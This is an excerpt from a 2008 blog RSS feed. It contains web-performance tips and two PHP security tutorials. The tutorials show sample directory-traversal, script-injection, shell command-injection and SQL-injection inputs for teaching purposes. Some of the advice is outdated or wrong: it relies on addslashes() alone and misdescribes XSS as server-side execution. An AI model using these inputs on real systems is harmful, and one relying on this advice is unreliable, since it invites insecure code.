<p> A complex page means more bytes to download and it also means slower DOM access in JavaScript. It makes a difference      if you loop through 500 or 5000 DOM elements on the page when you want to add an event handler for example. </p>
<p> A high number of DOM elements can be a symptom that there&#8217;s something that should be improved with the markup      of the page without necessarily removing content.      Are you using nested tables for layout purposes?      Are you throwing in more &lt;div&gt;s only to fix layout issues?      Maybe there&#8217;s a better and more semantically correct way to do your markup. </p>
<p> A great help with layouts are the <a target="_blank" href="http://developer.yahoo.com/yui/">YUI CSS utilities</a>:      grids.css can help you with the overall layout, fonts.css and reset.css      can help you strip away the browser&#8217;s defaults formatting.      This is a chance to start fresh and think about your markup,      for example use &lt;div&gt;s only when it makes sense semantically, and not because it renders a new line. </p>
<p> The number of DOM elements is easy to test, just type in Firebug&#8217;s console:<br />  document.getElementsByTagName(&#8216;*&#8217;).length </p>
<p> And how many DOM elements are too many? Check other similar pages that have good markup.      For example the <a target="_blank" href="http://www.yahoo.com">Yahoo! Home Page</a> is a pretty busy page and still under 700 elements (HTML tags). </p>
<h3 id="split">Split Components Across Domains</h3>
<p> Splitting components allows you to maximize parallel downloads. Make sure you&#8217;re using      not more than 2-4 domains because of the DNS lookup penalty.      For example, you can host your HTML and dynamic content      on www.example.org      and split static components between static1.example.org and static2.example.org </p>
<p> For more information check      &quot;<a target="_blank" href="http://yuiblog.com/blog/2007/04/11/performance-research-part-4/">Maximizing Parallel Downloads in the Carpool Lane</a>&quot; by Tenni Theurer and Patty Chi. </p>
<h3 id="iframes">Minimize the Number of iframes</h3>
<p> Iframes allow an HTML document to be inserted in the parent document.      It&#8217;s important to understand how iframes work so they can be used effectively. </p>
<p> &lt;iframe&gt; pros: </p>
<ul>
<li>Helps with slow third-party content like badges and ads</li>
<li>Security sandbox</li>
<li>Download scripts in parallel</li>
</ul>
<p> &lt;iframe&gt; cons: </p>
<ul>
<li>Costly even if blank</li>
<li>Blocks page onload</li>
<li>Non-semantic</li>
</ul>
<h3 id="no404">No 404s</h3>
<p> HTTP requests are expensive so making an HTTP request and getting a useless response (i.e. 404 Not Found)      is totally unnecessary and will slow down the user experience without any benefit. </p>
<p> Some sites have helpful 404s &quot;Did you mean X?&quot;, which is great for the user      experience but also wastes server resources (like database, etc).      Particularly bad is when the link to an external JavaScript is wrong and the result is a 404.      First, this download will block parallel downloads. Next the browser may try to parse      the 404 response body as if it were JavaScript code, trying to find something usable in it. </p>
<h3 id="cookie_size">Reduce Cookie Size</h3>
<p> HTTP cookies are used for a variety of reasons such as authentication and personalization.      Information about cookies is exchanged in the HTTP headers between web servers and browsers.      It&#8217;s important to keep the size of cookies as low as possible to minimize the impact on the user&#8217;s response time. </p>
<p> For more information check <a target="_blank" href="http://yuiblog.com/blog/2007/03/01/performance-research-part-3/">&quot;When the Cookie Crumbles&quot;</a> by Tenni Theurer and Patty Chi.      The take-home of this research: </p>
<ul>
<li>Eliminate unnecessary cookies</li>
<li>Keep cookie sizes as low as possible to minimize the impact on the user response time</li>
<li>Be mindful of setting cookies at the appropriate domain level so other sub-domains are not affected</li>
<li>Set an Expires date appropriately. An earlier Expires date or none removes the cookie sooner, improving the user response time</li>
</ul>
<h3 id="cookie_free">Use Cookie-free Domains for Components</h3>
<p> When the browser makes a request for a static image and sends cookies together with the request,      the server doesn&#8217;t have any use for those cookies. So they only create network traffic for no good      reason. You should make sure static components are requested with cookie-free requests. Create      a subdomain and host all your static components there. </p>
<p> If your domain is www.example.org, you can host your static components      on static.example.org. However, if you&#8217;ve already set cookies on the top-level domain      example.org as opposed to www.example.org, then all the requests to      static.example.org will include those cookies. In this case, you can buy a whole new domain, host your static      components there, and keep this domain cookie-free. Yahoo! uses yimg.com, YouTube uses ytimg.com,      Amazon uses images-amazon.com and so on. </p>
<p> Another benefit of hosting static components on a cookie-free  domain is that some proxies might refuse to cache the components that  are requested with cookies. On a related note, if you wonder if you  should use example.org or www.example.org for your home page, consider  the cookie impact. Omitting www leaves you no choice but to write  cookies to *.example.org, so for performance reasons it&#8217;s best to use the      www subdomain and      write the cookies to that subdomain. </p>
<h3 id="dom_access">Minimize DOM Access</h3>
<p> Accessing DOM elements with JavaScript is slow so in order to have a more responsive page, you should: </p>
<ul>
<li>Cache references to accessed elements</li>
<li>Update nodes &quot;offline&quot; and then add them to the tree</li>
<li>Avoid fixing layout with JavaScript</li>
</ul>
<p> For more information check the YUI theatre&#8217;s <a target="_blank" href="http://yuiblog.com/blog/2007/12/20/video-lecomte/">&quot;High Performance Ajax Applications&quot;</a> by Julien Lecomte. </p>
<h3 id="events">Develop Smart Event Handlers</h3>
<p> Sometimes pages feel less responsive because of too many event handlers attached to different      elements of the DOM tree which are then executed too often. That&#8217;s why using <em>event delegation</em> is a good approach.      If you have 10 buttons inside a div,  attach only one event handler to the div wrapper, instead of one  handler for each button. Events bubble up so you&#8217;ll be able to catch  the event and figure out which button it originated from. </p>
<p> You also don&#8217;t need to wait for the onload event in order to start  doing something with the DOM tree. Often all you need is the element  you want to access to be available in the tree. You don&#8217;t have to wait  for all images to be downloaded. DOMContentLoaded is the event you might consider using instead of onload, but until it&#8217;s available in all browsers, you      can use the <a target="_blank" href="http://developer.yahoo.com/yui/event/">YUI Event</a> utility, which has an <a target="_blank" href="http://developer.yahoo.com/yui/event/#onavailable">onAvailable</a> method. </p>
<p> For more information check the YUI theatre&#8217;s <a target="_blank" href="http://yuiblog.com/blog/2007/12/20/video-lecomte/">&quot;High Performance Ajax Applications&quot;</a> by Julien Lecomte. </p>
<h3 id="csslink">Choose &lt;link&gt; over @import</h3>
<p> One of the previous best practices states that CSS should be at the top in order to allow for      progressive rendering. </p>
<p> In IE @import behaves the same as using &lt;link&gt; at the bottom of the page, so it&#8217;s best not to use it. </p>
<h3 id="no_filters">Avoid Filters</h3>
<p> The IE-proprietary AlphaImageLoader filter aims to fix a problem with semi-transparent true color PNGs in IE versions &lt; 7.      The problem with this filter is that it blocks rendering and freezes the browser while the image is being downloaded.      It also increases memory consumption and is applied per element, not per image, so the problem is multiplied. </p>
<p> The best approach is to avoid AlphaImageLoader completely and use gracefully degrading PNG8 instead, which are fine in IE.      If you absolutely need AlphaImageLoader, use the underscore hack _filter as to not penalize your IE7+ users. </p>
<h3 id="opt_images">Optimize Images</h3>
<p> After a designer is done with creating the images for your web page, there are still some things you can try before you      FTP those images to your web server. </p>
<ul>
<li>You can check the GIFs and see if they are using a palette size corresponding          to the number of colors in the image. Using <a target="_blank" href="http://www.imagemagick.org">imagemagick</a> it&#8217;s easy to check using <br />    identify -verbose image.gif <br />    When you see an image useing 4 colors and a 256 color &quot;slots&quot; in the palette, there is room for improvement. </li>
<li> Try converting GIFs to PNGs and see if there is a saving. More often than not, there is.          Developers often hesitate to use PNGs due to the limited support in browsers, but this is now a thing of the past.          The only real problem is alpha-transparency in true color PNGs, but then again, GIFs are not true color and don&#8217;t          support variable transparency either.          So anything a GIF can do, a palette PNG (PNG8) can do too (except for animations).          This simple imagemagick command results in totally safe-to-use          PNGs:<br />    convert image.gif image.png <br />    &quot;All we are saying is: Give PiNG a Chance!&quot; </li>
<li> Run <a target="_blank" href="http://pmt.sourceforge.net/pngcrush/">pngcrush</a> (or any other PNG optimizer tool) on all your PNGs. Example: <br />    pngcrush image.png -rem alla -reduce -brute result.png </li>
<li> Run jpegtran on all your JPEGs. This tool does lossless JPEG operations  such as rotation and can also be used to optimize and remove comments  and other useless information (such as EXIF information) from your  images. <br />    jpegtran -copy none -optimize -perfect src.jpg dest.jpg </li>
</ul>
<h3 id="opt_sprites">Optimize CSS Sprites</h3>
<ul>
<li>Arranging the images in the sprite horizontally as opposed to vertically usually results in a smaller file size.</li>
<li>Combining similar colors in a sprite helps you keep the color count low, ideally under 256 colors so to fit in a PNG8.</li>
<li>&quot;Be mobile-friendly&quot; and don&#8217;t leave big gaps between the images in a sprite. This doesn&#8217;t affect the file size as much          but requires less memory for the user agent to decompress the image into a pixel map.          100&#215;100 image is 10 thousand pixels, where 1000&#215;1000 is 1 million pixels </li>
</ul>
<h3 id="no_scale">Don&#8217;t Scale Images in HTML</h3>
<p> Don&#8217;t use a bigger image than you need just because you can set the width and height in HTML.      If you need <br />  &lt;img width=&quot;100&quot; height=&quot;100&quot; src=&quot;mycat.jpg&quot; alt=&quot;My Cat&quot; /&gt; <br />  then your image (mycat.jpg) should be 100x100px rather than a scaled down 500x500px image. </p>
<h3 id="favicon">Make favicon.ico Small and Cacheable</h3>
<p> The favicon.ico is an image that stays in the root of your server.      It&#8217;s a necessary evil because even if you don&#8217;t care about it the      browser will still request it, so it&#8217;s better not to respond with a 404 Not Found.      Also since it&#8217;s on the same server, cookies are sent every time it&#8217;s requested.      This image also interferes with the download sequence, for example in IE when you request      extra components in the onload, the favicon will be downloaded before these extra components. </p>
<p> So to mitigate the drawbacks of having a favicon.ico make sure: </p>
<ul>
<li>It&#8217;s small, preferably under 1K.</li>
<li>Set Expires header with what you feel comfortable (since you cannot rename it if you decide to change it).          You can probably safely set the Expires header a few months in the future.          You can check the last modified date of your current favicon.ico to make an informed decision. </li>
</ul>
<p> <a target="_blank" href="http://www.imagemagick.org">Imagemagick</a> can help you create small favicons </p>
<h3 id="under25">Keep Components under 25K</h3>
<p> This restriction is related to the fact that iPhone won&#8217;t cache components bigger than 25K.      Note that this is the <em>uncompressed</em> size. This is where minification is important      because gzip alone may not be sufficient. </p>
<p> For more information check <a target="_blank" href="http://yuiblog.com/blog/2008/02/06/iphone-cacheability/">&quot;Performance Research, Part 5: iPhone Cacheability &#8211; Making it Stick&quot;</a> by Wayne Shea and Tenni Theurer. </p>
<p><a target="_blank" href="http://developer.yahoo.com/performance/rules.html#page-nav"></a></p>
<h3 id="multipart">Pack Components into a Multipart Document</h3>
<p>Packing components into a multipart document is like an email with attachments,      it helps you fetch several components with one HTTP request (remember: HTTP requests are expensive).      When you use this technique, first check if the user agent supports it (iPhone does not). </p>
<p>Source:  <a target="_blank" href="http://developer.yahoo.com/performance/rules.html">Yahoo! Developer Network</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/92/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/92/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/92/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=92&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/07/09/best-practices-for-speeding-up-your-web-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>PHP Security / SQL Security &#8211; Part 1</title>
		<link>http://samashok.wordpress.com/2008/06/05/php-security-sql-security-part-1/</link>
		<comments>http://samashok.wordpress.com/2008/06/05/php-security-sql-security-part-1/#comments</comments>
		<pubDate>Thu, 05 Jun 2008 07:53:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[PHP / SQL Security]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/06/05/php-security-sql-security-part-1/</guid>
		<description><![CDATA[Web Security: The Big Picture Whether your site is the web presence for a large multinational, a gallery showing your product range and inviting potential customers to come into the shop, or a personal site exhibiting your holiday photos, web security matters. After the hard work put in to make your site look good and [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=91&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>
<h3>Web Security: The Big Picture</h3>
<p>Whether your site is the   web presence for a large multinational, a gallery showing your product range and   inviting potential customers to come into the shop, or a personal site   exhibiting your holiday photos, web security matters. After the hard work put in   to make your site look good and respond to your users, the last thing you want   is for a malicious hacker to come along, perform a PHP hack and break it   somehow.</p>
<p>There are a number of problems in web security, and unfortunately not all of   them have definite solutions, but here we&#8217;ll look at some of the problems that   should be considered every time you set out to write a PHP script to avoid a PHP   hack attack. These are the problems which, with well-designed code, can be   eliminated entirely. Before looking in detail at the solutions, though, lets   take a moment to define the problems themselves.</p>
<p>
<h3><A>SQL Injection</a></h3>
<p>In this attack, a user is able to execute   SQL queries in your website&#8217;s database. This attack is usually performed by   entering text into a form field which causes a subsequent SQL query, generated   from the PHP form processing code, to execute part of the content of the form   field as though it were SQL. The effects of this attack range from the harmless   (simply using SELECT to pull another data set) to the devastating (DELETE, for   instance). In more subtle attacks, data could be changed, or new data added.</p>
<p>
<h3>Directory Traversal</h3>
<p>This attack can occur anywhere   user-supplied data (from a form field or uploaded filename, for example) is used   in a filesystem operation. If a user specifies &ldquo;../../../../../../etc/passwd&rdquo; as   form data, and your script appends that to a directory name to obtain   user-specific files, this string could lead to the inclusion of the password   file contents, instead of the intended file. More severe cases involve file   operations such as moving and deleting, which allow an attacker to make   arbitrary changes to your filesystem structure.</p>
<p>
<h3>Authentication Issues</h3>
<p>Authentication issues involve users   gaining access to something they shouldn&#8217;t, but to which other users should. An   example would be a user who was able to steal (or construct) a cookie allowing   them to login to your site under an Administrator session, and therefore be able   to change anything they liked.</p>
<p>
<h3>Remote Scripts (XSS)</h3>
<p><A>XSS, or Cross-Site Scripting </a>(also   sometimes referred to as CSS, but this can be confused with Cascading Style   Sheets, something entirely different!) is the process of exploiting a security   hole in one site to run arbitrary code on that site&#8217;s server. The code is   usually included into a running PHP script from a remote location. This is a   serious attack which could allow any code the attacker chooses to be run on the   vulnerable server, with all of the permissions of the user hosting the script,   including database and filesystem access.</p>
<p>
<h3>Processing User Data &ndash; Form Input Verification &amp; HTML   Display</h3>
</p>
<p>
<h3>Validating Input And Stripping Tags</h3>
<p>When a user enters   information into a form which is to be later processed on your site, they have   the power to enter anything they want. Code which processes form input should be   carefully written to ensure that the input is as requested; password fields have   the required level of complexity, e-mail fields have at least some characters,   an @ sign, some more characters, a period, and two or more characters at the   end, zip or postal codes are of the required format, and so on.</p>
<p>Each of these may be verified using regular expressions, which scan the input   for certain patterns. An example for e-mail address verification is the PHP code   shown below. This evaluates to true if an e-mail address was entered in the   field named &#8216;email&#8217;.</p>
<p>preg_match(&#8216;/^.+@.+\..{2,3}$/&#8217;,$_POST['email']);</p>
<p>This code just constructs a regular expression based on the format described   above for an e-mail address. Note that this will return true for anything with   an @ sign and a dot followed by 2 or 3 characters. That is the general format   for an e-mail address, but it doesn&#8217;t mean that address necessarily exists;   you&#8217;d have to send mail to it to be sure of that.</p>
<p>Interesting as this is, how does it relate to security? Well, consider a   guestbook as an example. Here, users are invited to enter a message into a form,   which then gets displayed on the HTML page along with everyone else&#8217;s messages.   For now, we won&#8217;t go into database security issues, the problems dealt with   below can occur whether the data is stored in a database, a file, or some other   construct.</p>
<p>If a user enters data which contains HTML, or even JavaScript, then when the   data is included into your HTML for display later, their HTML or JavaScript will   also get included.</p>
<p>If your guestbook page displayed whatever was entered into the form field,   and a user entered the following,</p>
<p>Hi, I &lt;b&gt;love&lt;/b&gt; your site.</p>
<p>Then the effect is minimal, when displayed later, this would appear as,</p>
<p>Hi, I <b>love</b> your site.</p>
<p>Of course, when the user enters JavaScript, things can get a lot worse. For   example, the data below, when entered into a form which does not prevent   JavaScript ending up in the final displayed page, will cause the page to   redirect to a different website. Obviously, this only works if the client has   JavaScript enabled in their browser, but the vast majority of users do.</p>
<p>Hi, I love your site. Its   great!&lt;script<BR>  language=&rdquo;JavaScript&rdquo;&gt;document.location=&rdquo;http://www.acunetix.com/&rdquo;;&lt;/script&gt;</p>
<p>For a split second when this is displayed, the user will see,</p>
<p>Hi, I love your site. Its great!</p>
<p>The browser will then kick in and the page will be refreshed from   www.acunetix.com. In this case, a fairly harmless alternative page, although it   does result in a denial of service attack; users can no longer get to your   guestbook.</p>
<p>Consider a case where this was entered into an online order form. Your order   dispatchers would not be able to view the data because every time they tried,   their browser would redirect to another site. Worse still, if the redirection   occurred on a critical page for a large business, or the redirection was to a   site containing objectionable material, custom may be lost as a result of the   attack.</p>
<p>Fortunately, PHP provides a way to prevent this style of PHP hack attack. The   functions strip_tags(), nl2br() and htmlspecialchars() are your friends,   here.</p>
<p>strip_tags() removes any PHP or HTML tags from a string. This prevents the   HTML display problems, the JavaScript execution (the &lt;script&gt; tag will no   longer be present) and a variety of problems where there is a chance that PHP   code could be executed.</p>
<p>nl2br() converts newline characters in the input to &lt;br /&gt; HTML tags.   This allows you to format multi-line input correctly, and is mentioned here only   because it is important to run strip_tags() prior to running nl2br() on your   data, otherwise the newly inserted &lt;br /&gt; tags will be stripped out when   strip_tags() is run!</p>
<p>Finally, htmlspecialchars() will entity-quote characters such as &lt;, &gt;   and &amp; remaining in the input after strip_tags() has run. This prevents them   being misinterpreted as HTML and makes sure they are displayed properly in any   output.</p>
<p>Having presented those three functions, there are a few points to make about   their usage. Clearly, nl2br() and htmlspecialchars() are suited for output   formatting, called on data just before it is output, allowing the database or   file-stored data to retain normal formatting such as newlines and characters   such as &amp;. These functions are designed mainly to ensure that output of data   into an HTML page is presented neatly, even after running strip_tags() on any   input.</p>
<p>strip_tags(), on the other hand, should be run immediately on input of data,   before any other processing occurs. The code below is a function to clean user   input of any PHP or HTML tags, and works for both GET and POST request   methods.</p>
<p>function _INPUT($name)<BR>  {<BR>  &nbsp;&nbsp;&nbsp; if   ($_SERVER['REQUEST_METHOD'] == &#8216;GET&#8217;)<BR>  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return   strip_tags($_GET[$name]);<BR>  &nbsp;&nbsp;&nbsp; if ($_SERVER['REQUEST_METHOD'] ==   &#8216;POST&#8217;)<BR>  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return strip_tags($_POST[$name]);<BR>  }</p>
<p>This function could easily be expanded to include cookies in the search for a   variable name. I called it _INPUT because it directly parallels the $_ arrays   which store user input. Note also that when using this function, it does not   matter whether the page was requested with a GET or a POST method, the code can   use _INPUT() and expect the correct value regardless of request method. To use   this function, consider the following two lines of code, which both have the   same effect, but the second strips the PHP and HTML tags first, thus increasing   the security of the script.</p>
<p>$name = $_GET['name');<BR>  $name = _INPUT('name');</p>
<p>If data is to be entered into a database, more processing is needed to   prevent SQL injection, which will be discussed later.</p>
<p>
<h3>Executing Code Containing User Input</h3>
<p>Another concern when   dealing with user data is the possibility that it may be executed in PHP code or   on the system shell. PHP provides the eval() function, which allows arbitrary   PHP code within a string to be evaluated (run). There are also the system(),   passthru() and exec() functions, and the backtick operator, all of which allow a   string to be run as a command on the operating system shell.</p>
<p>Where possible, the use of all such functions should be avoided, especially   where user input is entered into the command or code. An example of a situation   where this can lead to attack is the following command, which would display the   results of the command on the web page.</p>
<p>echo 'Your usage log:&lt;br /&gt;';<BR>  $username =   $_GET['username'];<BR>  passthru(&ldquo;cat /logs/usage/$username&rdquo;);</p>
<p>passthru() runs a command and displays the output as output from the PHP   script, which is included into the final page the user sees. Here, the intent is   obvious, a user can pass their username in a GET request such as   usage.php?username=andrew and their usage log would be displayed in the browser   window.</p>
<p>But what if the user passed the following URL?</p>
<p>usage.php?username=andrew;cat%20/etc/passwd</p>
<p>Here, the username value now contains a semicolon, which is a shell command   terminator, and a new command afterwards. The %20 is a URL-Encoded space   character, and is converted to a space automatically by PHP. Now, the command   which gets run by passthru() is,</p>
<p>cat /logs/usage/andrew;cat /etc/passwd</p>
<p>Clearly this kind of command abuse cannot be allowed. An attacker could use   this vulnerability to read, delete or modify any file the web server has access   to. Luckily, once again, PHP steps in to provide a solution, in the form of the   escapeshellarg() function. escapeshellarg() escapes any characters which could   cause an argument or command to be terminated. As an example, any single or   double quotes in the string are replaced with \&#8217; or \&rdquo;, and semicolons are   replaced with \;. These replacements, and any others performed by   escapeshellarg(), ensure that code such as that presented below is safe to   run.</p>
<p>$username = escapeshellarg($_GET['username']);<BR>  passthru(&ldquo;cat   /logs/usage/$username&rdquo;);</p>
<p>Now, if the attacker attempts to read the password file using the request   string above, the shell will attempt to access a file called   &ldquo;/logs/usage/andrew;cat /etc/passwd&rdquo;, and will fail, since this file will almost   certainly not exist.</p>
<p>It is generally considered that eval() called on code containing user input   be avoided at all costs; there is almost always a better way to achieve the   desired effect. However, if it must be done, ensure that strip_tags has been   called, and that any quoting and character escapes have been performed.</p>
<p>Combining the above techniques to provide stripping of tags, escaping of   special shell characters, entity-quoting of HTML and regular expression-based   input validation, it is possible to construct secure web scripts with relatively   little work over and above constructing one without the security considerations.   In particular, using a function such as the _INPUT() presented above makes the   secure version of input acquisition almost as painless as the insecure version   PHP provides.</p>
<p>
<h3>How to check for PHP vulnerabilities</h3>
<p>The best way to   check whether your web site &amp; applications are vulnerable to PHP hack   attacks is by using a Web Vulnerability Scanner. A Web Vulnerability Scanner   crawls your entire website and automatically checks for vulnerabilities to PHP   attacks. It will indicate which scripts are vulnerable so that you can fix the   vulnerability easily. Besides PHP security vulnerabilities, a web application   scanner will also check for SQL injection, Cross site scripting &amp; other web   vulnerabilities.</p>
<p><A>Acunetix Web Vulnerability   Scanner</A> ensures website security by automatically checking for <A>SQL injection</A>, <A>Cross site scripting</A> and   other vulnerabilities. It checks password strength on authentication pages and   automatically audits shopping carts, forms, dynamic content and other web   applications. As the scan is being completed, the software produces detailed   reports that pinpoint where vulnerabilities exist. Take a <A>product tour</A> or <A>download</A> the evaluation version   today!</p>
<p>
<h3>Scanning for XSS vulnerabilities with Acunetix WVS Free   Edition!</h3>
<p>To check whether your website has cross site scripting   vulnerabilities, download the Free Edition from <A>http://www.acunetix.com/cross-site-scripting/scanner.htm</A>.   This version will scan any website / web application for <A>XSS</A> vulnerabilities and it will also reveal all the essential   information related to it, such as the vulnerability location and remediation   techniques. Scanning for XSS is normally a quick exercise (depending on the size   of the web-site).</p>
<p>
<h3>Later In The Series</h3>
<p>This series will go on to look at SQL   databases, and protecting against SQL injection attacks, as well as file   operations and session management, including a look at one of the features of   PHP designed to increase security and avoid PHP hack attacks- the PHP Safe   Mode.</p>
<p>Source: <A>Website security</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/91/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/91/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/91/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=91&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/06/05/php-security-sql-security-part-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>PHP / SQL Security &#8211; Part 2</title>
		<link>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-2/</link>
		<comments>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-2/#comments</comments>
		<pubDate>Thu, 05 Jun 2008 07:52:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[PHP / SQL Security]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/06/05/php-sql-security-part-2/</guid>
		<description><![CDATA[Last Time&#8230; In the previous article, I looked at processing and securing user input when it is to be redisplayed or executed as PHP code. Now its time to consider entering that data into a database, and cover the security issues which arise when doing so. SQL Injection SQL (Structured Query Language) is the language [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=90&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>
<h6>Last Time&#8230;</h6>
<p>In the previous article, I looked at   processing and securing user input when it is to be redisplayed or executed as   PHP code. Now its time to consider entering that data into a database, and cover   the security issues which arise when doing so.</p>
<p>
<h3>SQL Injection</h3>
<p>SQL (Structured Query Language) is the   language used to interface with many database systems, including MySQL,   PostgreSQL and MSSQL. Certain words and characters are interpreted specially by   SQL, as commands, separators, or command terminators, for instance.</p>
<p>When a user enters data into a form, there is nothing stopping them entering   these special commands and characters. Consider the PHP code below:</p>
<p>$query = &ldquo;INSERT INTO orders(address)   VALUES(&#8216;$_GET['address']&#8216;)&rdquo;;<BR>  $result = mysql_query($query);</p>
<p>A form with a textbox named address would be used to gather the information   for this page. We&#8217;ll ignore any other form elements for now, but obviously   there&#8217;d be the order items, a name, possibly a price, a delivery date, and so   on, which would also all need storing in a database.</p>
<p>Imagine a perfectly legitimate user comes along and enters the following   address</p>
<p>14 King&#8217;s Way<BR>  Kingston<BR>  Kingham County</p>
<p>The database would spit back an error because the SQL command would be   malformed. In the query, the address value is surrounded by single quotes,   because it is a string value. When the database hits the apostrophe in King&#8217;s   Way, it will treat it as the closing single quote, and end the string. The rest   of the address will be treated as SQL commands. Since these &ldquo;commands&rdquo; don&#8217;t   exist, the database returns to PHP with an error.</p>
<p>Now consider an attacker entering the following information into the   form:</p>
<p>14 Kings Way<BR>  Kingston<BR>  Kingham County&#8217;);DELETE FROM orders   *; INSERT INTO ORDERS(address) VALUES(&#8216;Your data just got deleted by us. We   win</p>
<p>Now, the command will succeed. The expected string data is presented, along   with a closing quote. The opening ( after VALUES is closed, and the SQL command   is terminated using a semicolon. After this, another command begins, one which   tells the database to delete the entire contents of the orders table. Then,   because the SQL hard-coded into the PHP contains another closing single quote, a   third SQL command is entered, which leaves an open string value. This will be   matched up with the final quote in the hard-coded SQL, and the entire command is   syntactically correct, as far as SQL is concerned, and will therefore execute   with no complaint.</p>
<p>Clearly, it is not desirable for any user to be able to issue arbitrary   queries simply by posting data in a form. Luckily for us, as with the PHP and   HTML input issues discussed in part 1, PHP provides a solution. The addslashes()   and stripslashes() functions step in to prevent the above scenarios, and any   number of similar attacks.</p>
<p>addslashes() will escape characters with a special meaning to SQL, such as &#8216;   or ; by prefixing them with a backslash (\), the backslash itself is also   escaped, becoming \\. stripslashes() performs the opposite conversion, removing   the prefix slashes from a string.</p>
<p>When entering data into a database, addslashes() should be run on all   user-supplied data, and any PHP generated data which may contain special   characters. To guarantee safety, simply run addslashes() on every string input   to the database, even if it was generated internally by a PHP function.   Similarly, be sure to run stripslashes() when pulling data back out from the   database.</p>
<p>
<h3>Non-String Variables</h3>
<p>Since PHP automatically determines   the type of a variable, you should also check variables which you expect to be   integers or other data types. For instance, the int type in SQL does not need to   be quoted, but it is still possible for a string in a PHP variable to be   inserted into an SQL query in the position an integer would usually take.   Consider the example below.</p>
<p>$query = &ldquo;INSERT INTO customers(customer_number)   VALUES($_POST['number'])&rdquo;;</p>
<p>If a user supplied the value</p>
<p>0); DROP TABLE customers; CREATE TABLE   customers(customer_id</p>
